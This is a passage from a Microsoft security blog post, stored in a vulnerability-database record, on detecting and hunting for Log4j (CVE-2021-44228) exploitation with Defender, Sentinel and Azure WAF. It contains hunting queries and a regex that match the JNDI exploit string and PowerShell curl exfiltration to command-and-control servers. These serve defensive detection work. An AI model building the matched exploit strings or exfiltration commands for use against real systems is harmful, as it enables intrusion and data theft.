[Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms: \n\n * **Log4j exploitation detected** \u2013 detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability\n * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) \u2013 detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation\n * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity \n\nThe following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don\u2019t necessarily indicate successful exploitation:\n\n * **Possible target of Log4j exploitation - **detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __received by__ this device\n * **Possible target of Log4j vulnerability scanning** \u2013 detects a possible __attempt to scan__ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device\n * **Possible source of Log4j exploitation** \u2013 detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __initiated from__ this device \n * **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation\n * **Possible Log4j exploitation (CVE-2021-44228)** \u2013 inactive, initially covered several of the above, now replaced with more specific titles\n\nThe following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:\n\n * Suspicious remote PowerShell execution \n * Download of file associated with digital currency mining \n * Process associated with digital currency mining \n * Cobalt Strike command and control detected \n * Suspicious network traffic connection to C2 Server \n * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) \n\nSome of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.\n\n\n\n_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_\n\n#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)\n\nMicrosoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:\n\n * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))\n\n\n\n_Figure 15. Microsoft 365 Defender alert &quot;Exploitation attempt against Log4j (CVE-2021-4428)&quot;_\n\n#### Microsoft Defender for Office 365\n\nTo add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the \u201cjndi\u201d string in email headers or the sender email address field), which are moved to the Junk folder.\n\nWe also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:\n\n * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt \u2013 Email Headers (CVE-2021-44228))\n\n\n\n_Figure 16. __Sample alert on malicious sender display name found in email correspondence_\n\nThis detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.\n\n\n\n_Figure 17. Sample email with malicious sender display name_\n\nIn addition, this email event as can be surfaced via advanced hunting:\n\n\n\n_Figure 18. Sample email event surfaced via advanced hunting _\n\n#### Microsoft 365 Defender advanced hunting queries\n\nTo locate possible exploitation activity, run the following queries:\n\n**Possible malicious indicators in cloud application events**\n\nThis query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers\u2019 details such as IP address, Payload string, Download URL, etc. \n \n \n CloudAppEvents\n | where Timestamp > datetime(\"2021-12-09\")\n | where UserAgent contains \"jndi:\" \n or AccountDisplayName contains \"jndi:\"\n or Application contains \"jndi:\"\n or AdditionalFields contains \"jndi:\"\n | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields\n\n**Alerts related to Log4j vulnerability**\n\nThis query looks for alert activity pertaining to the Log4j vulnerability.\n \n \n AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation',\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt\n )\n\n**Devices with Log4j vulnerability alerts and additional other alert-related context**\n\nThis query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device. \n \n \n // Get any devices with Log4J related Alert Activity\n let DevicesLog4JAlerts = AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation'\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previouskly titled Log4j Exploitation Attempt\n )\n // Join in evidence information\n | join AlertEvidence on AlertId\n | where DeviceId != \"\"\n | summarize by DeviceId, Title;\n // Get additional alert activity for each device\n AlertEvidence\n | where DeviceId in(DevicesLog4JAlerts)\n // Add additional info\n | join kind=leftouter AlertInfo on AlertId\n | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)\n\n**Suspected exploitation of Log4j vulnerability**\n\nThis query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')\n //Removing FPs \n | where not(ProcessCommandLine has_any('stackstorm', 'homebrew')) \n\n**Regex to identify malicious exploit string**\n\nThis query looks for the malicious string needed to exploit this vulnerability.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}' \n or InitiatingProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}'\n\n**Suspicious process event creation from VMWare Horizon TomcatService**\n\nThis query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName has \"ws_TomcatService.exe\"\n | where FileName != \"repadmin.exe\"\n\n**Suspicious JScript staging comment**\n\nThis query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has \"VMBlastSG\"\n \n\n**Suspicious PowerShell curl flags**\n\nThis query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the \u201cBody\u201d argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has_all(\"-met\", \"POST\", \"-Body\")\n\n### Microsoft Defender for Cloud\n\nMicrosoft Defender for Cloud\u2019s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:\n\nOn Windows:\n\n * Detected obfuscated command line\n * Suspicious use of PowerShell detected\n\nOn Linux:\n\n * Suspicious file download\n * Possible Cryptocoinminer download detected\n * Process associated with digital currency mining detected\n * Potential crypto coin miner started\n * A history file has been cleared\n * Suspicious Shell Script Detected\n * Suspicious domain name reference\n * Digital currency mining related behavior detected\n * Behavior similar to common Linux bots detected\n\n### Microsoft Defender for IoT\n\nMicrosoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below). \n\n\n\n_Figure 19. Microsoft Defender for IoT alert_ \n\nThe package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (Click _Updates_, then _Download file _(MD5: 4fbc673742b9ca51a9721c682f404c41). \n\n\n\n_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_\n\nMicrosoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, [click here ](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>)for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.\n\nWorking with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).\n\n### Microsoft Sentinel\n\nA new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.\n\n\n\n_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_\n\nTo deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert &amp; Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).\n\n### Azure Web Application Firewall (WAF)\n\nIn response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.\n\nTo help detect and mitigate the Log2Shell vulnerability by inspecting requests\u2019 headers, URI, and body, we have released the following:\n\n * For Azure Front Door deployments, we have updated the rule **944240 \u201cRemote Command Execution\u201d** under Managed Rules\n * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules\n\nThese rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.\n\n**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.\n\n\n\n_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1 _\n\n\n\n_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_\n\nNote: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.\n\nMore information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).\n\n## Indicators of compromise (IOCs)\n\nMicrosoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)[https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)\n\nMicrosoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.\n\n#### Revision history\n\n**_[01/19/2022] _**_New information about an unrelated vulnerability we discovered while investigating Log4j attacks_\n\n_**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries _\n\n_**[01/10/2022] **Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_\n\n**_[01/07/2022] _**_Added a new rule group in _Azure Web Application Firewall (WAF)_ _\n\n**_[12/27/2021] _**_New capabilities in __threat and vulnerability management__ including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._\n\n_**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._\n\n_**[12/21/2021]**_ _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._\n\n**_[12/17/2021] _**_New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._\n\n_**[12/16/2021] **New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._\n\n_**[12/15/2021] **Details _about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._ _\n\n_**[12/14/2021] **New insights about multiple threat actors taking advantage of this vulnerability, _including nation-state actors and access brokers linked to ransomware._ _\n\nThe post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "published": "2021-12-12T05:29:03", "modified": "2021-12-12T05:29:03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "reporter": "Microsoft 365 Defender Threat Intelligence Team", "references": [], "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "immutableFields": [], "lastseen": "2022-01-19T21:30:14", "viewCount": 262, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:94B715279ABA113C427A5E987C080DA7", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2021-1733", "ALAS2-2022-1734", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:83F1ABD4-4E2B-4E5A-BFE5-81C4FB7A474A", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B"]}, {"type": "avleonov", "idList": ["AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34"]}, {"type": "broadcom", "idList": ["BSA-2021-1658"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0476", "CPAI-2021-0548", "CPAI-2021-0936", "CPAI-2021-0955", "CPAI-2021-1011"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:84B5063678E22C88DCF150A265C078F7", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-26084", "CVE-2021-3100", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44428", "CVE-2021-44530", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DLA-2852-1:37D89", "DEBIAN:DLA-2870-1:54673", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE", "DEBIAN:DSA-5024-1:FE296"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-44832", "DEBIANCVE:CVE-2021-45046", "DEBIANCVE:CVE-2021-45105"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243", "EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K14122652", "F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K34162192"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:7DC2630AEB07", "FEDORA:95A5B306879A", "FEDORA:A5A703103140", "FEDORA:E468830AF07B"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-21-245"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4", "B0F49CB9-6736-11EC-9EEA-589CFC007716", "D1BE3D73-6737-11EC-9EEA-589CFC007716"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-8489-44MV-GGJ8", 